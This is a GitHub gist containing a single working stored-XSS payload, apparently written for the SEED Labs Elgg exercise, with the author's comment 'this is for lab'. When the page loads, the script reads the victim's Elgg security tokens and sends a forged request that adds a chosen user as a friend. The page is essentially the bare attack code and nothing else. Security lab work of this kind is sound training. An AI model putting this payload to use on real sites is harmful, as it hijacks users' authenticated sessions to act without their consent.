Skip to content

Instantly share code, notes, and snippets.

@KSTARK007
Created November 11, 2019 12:47
Show Gist options
  • Save KSTARK007/1e9b818acbef2905219d46aade906794 to your computer and use it in GitHub Desktop.
Save KSTARK007/1e9b818acbef2905219d46aade906794 to your computer and use it in GitHub Desktop.
<script type="text/javascript"> window.onload=function() {var Ajax=null; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=47"+token+ts;Ajax=new XMLHttpRequest();Ajax.open("GET",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send();}</script>
@KSTARK007
Copy link
Author

this is for lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment